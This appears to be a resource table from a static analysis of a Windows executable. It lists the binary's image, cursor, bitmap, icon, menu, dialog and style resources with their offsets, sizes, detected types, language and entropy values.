                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cee300x135PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.029126213592233
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d09680xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d17400x129PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0303030303030303
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d05f80x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d05700x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cff000x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cfa700x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ff4e80xdd1PNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003109980209217
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x404ba00xd61PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0032116788321168
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4059080x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x405b700xbb9PNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036654448517162
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4067300xc66PNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034656584751103
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4073980xb90PNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037162162162163
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42a5d00xb07PNG image data, 5 x 5, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003896563939072
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x429a800xb50PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037983425414365
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4128f00x2885PNG image data, 42 x 348, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010604453870626
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4151780xd8ePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031700288184437
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x415f080x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4270e00x4f3PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0086819258089976
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x41a7580x130fPNG image data, 22 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022545603607296
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x41ba680xe74PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002972972972973
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x41e9180x11baPNG image data, 22 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002423975319524
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x41fad80xecePNG image data, 11 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0029023746701846
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x41c8e00x11baPNG image data, 22 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002423975319524
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x41daa00xe74PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002972972972973
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x407f280x1206PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023840485478976
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x40a2600x11bcPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024229074889868
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4091300x112aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025034137460174
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x40b4200x127aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023255813953489
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x40efc00xd3ePNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003244837758112
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x40fd000xbacPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036813922356091
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4114800x146aPNG image data, 56 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021048603138156
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4164480x122fPNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023630504833512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4176780xdecPNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0030864197530864
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4184680x1100PNG image data, 42 x 228, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025275735294117
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4195680x11edPNG image data, 42 x 140, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023970363913706
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x40d7580x1864PNG image data, 42 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003203074951954
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x40c6a00x10b5PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025718961889174
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4275d80x124bPNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023489216314327
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4288280x1256PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023434171282488
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4227f80xf2cPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002832131822863
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4219180xedePNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028901734104045
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4209a80xf69PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027883396704689
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4237280xe20PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0030420353982301
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42b0d80xdc7PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031187978451943
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4002c00xbaePNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036789297658864
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x400e700xd91PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003167290526922
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x401c080xb12PNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003881439661256
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4371a80xbc3PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036532713384259
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4365080xc9fPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003404518724853
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4357880xd7dPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031856356791196
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x434b900xbf7PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035912504080966
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x433ef80xc96PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034140285536934
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4331680xd8cPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4397900xbdaPNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036255767963085
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x438af00xca0PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034034653465347
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x437d700xd80PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031828703703705
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42ff880xbe2PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036160420775806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42f2f80xc8cPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034246575342465
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42e5780xd7bPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031874818893074
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42d9900xbe7PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036101083032491
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42ccf80xc94PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034161490683229
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42bf780xd80PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031828703703705
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x42bea00xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x43bd880xbd0PNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003637566137566
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x43b0f00xc97PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034129692832765
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x43a3700xd7aPNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031884057971014
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4325880xbdaPNG image data, 3 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036255767963085
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4318f80xc8fPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003421461897356
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x430b700xd86PNG image data, 13 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031773541305604
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4027200x1908PNG image data, 50 x 178, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9887640449438202
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4040280xb75PNG image data, 3 x 61, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037504261847938
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4108b00xbd0PNG image data, 9 x 51, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003637566137566
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x425b700x1570PNG image data, 18 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020043731778425
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x4245480x1623PNG image data, 18 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0019410622904534
                                                                                                                                                                                                                                                                                                                                                                                                                  STYLE_XML0x3308400x4e01HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1839851770243878
                                                                                                                                                                                                                                                                                                                                                                                                                  STYLE_XML0x3630000x4b09HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20396689052006872
                                                                                                                                                                                                                                                                                                                                                                                                                  STYLE_XML0x3972a80x4aa6HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20460491889063318
                                                                                                                                                                                                                                                                                                                                                                                                                  STYLE_XML0x3c8a700x4a18HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20397511598481655
                                                                                                                                                                                                                                                                                                                                                                                                                  STYLE_XML0x3fdb900x1955HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1918272937548188
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f0a80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f1e00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f2c00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f4100x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f5600x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f6b00x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f8000x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f9500x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32faa00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32fbf00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32fd400x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32fe900x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32ffe00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x3301300x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x3302800x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x3303d00x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x465c700x134dataEnglishUnited States0.20454545454545456
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x465dc00x134dataEnglishUnited States0.2857142857142857
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x465f100x134dataEnglishUnited States0.4675324675324675
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4660600x134dataEnglishUnited States0.2532467532467532
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4661b00x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.40584415584415584
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4663000x134dataEnglishUnited States0.4383116883116883
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4664500x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4665a00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4666f00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4512987012987013
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4668400x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4669900x134dataEnglishUnited States0.4448051948051948
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x466ae00x134dataEnglishUnited States0.525974025974026
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43f3b00x62cDevice independent bitmap graphic, 324 x 9 x 4, image size 1476EnglishUnited States0.2430379746835443
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43f2c80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.5818965517241379
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43f9e00x4a0Device independent bitmap graphic, 144 x 15 x 4, image size 1080EnglishUnited States0.3783783783783784
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43fe800x197aDevice independent bitmap graphic, 144 x 15 x 24, image size 6482, resolution 2834 x 2834 px/mEnglishUnited States0.380098129408157
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4418000xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.51
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x441ad80xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.515
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x441db00xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.43
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4420880xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.44
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4427c80x182aDevice independent bitmap graphic, 128 x 16 x 24, image size 6146, resolution 2834 x 2834 px/mEnglishUnited States0.2924345295829292
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4423600x468Device independent bitmap graphic, 128 x 16 x 4, image size 1024EnglishUnited States0.3058510638297872
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x443ff80x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4803030303030303
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4448500x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4765151515151515
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4450a80x158Device independent bitmap graphic, 32 x 15 x 4, image size 240EnglishUnited States0.41569767441860467
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4452000x188Device independent bitmap graphic, 48 x 12 x 4, image size 288EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x445fb80x1e8Device independent bitmap graphic, 48 x 16 x 4, image size 384EnglishUnited States0.5081967213114754
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x446ac80xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.18736462093862816
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4475a00xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.1844765342960289
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4480780xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.19497523000707714
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x448b880x7e2Device independent bitmap graphic, 25 x 26 x 24, image size 1978, resolution 2834 x 2834 px/mEnglishUnited States0.24033696729435083
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4493700xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.1935598018400566
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x449e800x134Device independent bitmap graphic, 17 x 17 x 4, image size 204EnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4461a00x928Device independent bitmap graphic, 48 x 16 x 24, image size 0, resolution 2834 x 2834 px/mEnglishUnited States0.533703071672355
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4445200x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.7518518518518519
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x444d780x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.3790123456790123
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4453880xc2aDevice independent bitmap graphic, 64 x 16 x 24, image size 3074, resolution 2834 x 2834 px/mEnglishUnited States0.42485549132947975
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4418c80x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.9367816091954023
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x441ba00x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.4482758620689655
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x441e780x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.33524904214559387
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4421500x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.3371647509578544
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x449fb80x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.6320987654320988
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x44a2e80x2256Device independent bitmap graphic, 324 x 9 x 24, image size 8750, resolution 2834 x 2834 px/mEnglishUnited States0.0608646188850967
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x44c5400x602aDevice independent bitmap graphic, 192 x 32 x 32, image size 24578, resolution 2834 x 2834 px/mEnglishUnited States0.2250385896498497
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4525700x2028Device independent bitmap graphic, 128 x 16 x 32, image size 0EnglishUnited States0.24708454810495628
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4545980x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11570247933884298
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4559780x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.10999606454151908
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x456d580x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11511216056670602
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4581380xeb2Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/mEnglishUnited States0.13157894736842105
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x458ff00x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11983471074380166
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x45a3d00x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.27371113734750097
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x45b7b00x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.2699724517906336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x45cb900x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.2426210153482881
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x45df700xeb2Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/mEnglishUnited States0.3413078149920255
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x45ee280x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.23868555686737505
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4602080x5a66Device independent bitmap graphic, 77 x 75 x 32, image size 23102, resolution 2834 x 2834 px/mEnglishUnited States0.046365914786967416
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x3306400xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x3306f80x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x2f54f00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.40053763440860213
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x2f57d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5202702702702703
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x466c680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.33198924731182794
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x466f500x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.41216216216216217
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4670a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4671c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.2661290322580645
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4674d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.18010752688172044
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4677c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.35135135135135137
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4678e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.06092057761732852
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4681900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.07658959537572255
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4686f80xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.042901234567901236
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4693a00x368Device independent bitmap graphic, 16 x 32 x 24, image size 768EnglishUnited States0.10550458715596331
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x4697680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6400709219858156
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_ICON0x469bd00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_MENU0x469d200x11cdataEnglishUnited States0.573943661971831
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x32ed280x80dataEnglishUnited States0.7265625
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43d0480x13cdataEnglishUnited States0.5949367088607594
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43d1880x1a4dataEnglishUnited States0.5380952380952381
